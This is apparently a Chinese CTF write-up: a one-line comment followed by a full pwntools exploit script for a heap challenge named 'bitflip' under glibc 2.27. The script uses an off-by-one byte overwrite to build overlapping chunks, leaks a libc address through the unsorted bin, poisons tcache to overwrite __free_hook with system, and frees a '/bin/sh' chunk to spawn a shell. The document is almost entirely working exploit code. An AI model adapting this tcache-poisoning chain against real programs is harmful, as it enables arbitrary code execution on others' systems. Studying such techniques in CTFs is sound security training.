拟态的pwn题全是堆题,这道题关于tcache的利用,我觉得是比较好的
#!/usr/bin/env python3
from pwn import *
exe = ELF("./bitflip_patched")
libc = ELF("./libc-2.27.so")
ld = ELF("./ld-2.27.so")
context.binary = exe
context.log_level="debug"
io= process([ld.path,exe.path],env={"LE_PRELOAD":libc.path})
def create(idx,size):
io.sendlineafter("Your choice: ",str(1))
io.sendlineafter("Index: ",str(idx))
io.sendlineafter("Size: ",str(size))
def edit(idx,content):
io.sendlineafter("Your choice: ",str(2))
io.sendlineafter("Index: ",str(idx))
io.sendlineafter("Content: ",content)
def show(idx):
io.sendlineafter("Your choice: ",str(3))
io.sendlineafter("Index: ",str(idx))
def remove(idx):
io.sendlineafter("Your choice: ",str(4))
io.sendlineafter("Index: ",str(idx))
for i in range(12): #这里多申请几个,因为0xc1太大了可能回覆盖到topchunk部分导致失败
create(i,0x38)
for i in range(8):
edit(i,b"a"*0x38+b"\xc1")
#gdb.attach(io)
for i in range(8):
remove(i+1) # 7个在tcache,一个在unsorted bin
create(12,0x38) #因为堆机制,会切割unsortedbin中的块
show(9) #切割的原位置是8
libc.address = u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-96-0x10-libc.sym['__malloc_hook']
print(hex(libc.address))
create(13,0x38) # 9
remove(13) # 造成空指针
edit(9,p64(libc.sym["__free_hook"])) #开始劫持free_hook
create(14,0x38)
create(15,0x38)
edit(14,"/bin/sh")
edit(15,p64(libc.sym["system"]))
remove(14)
#gdb.attach(io)
io.interactive()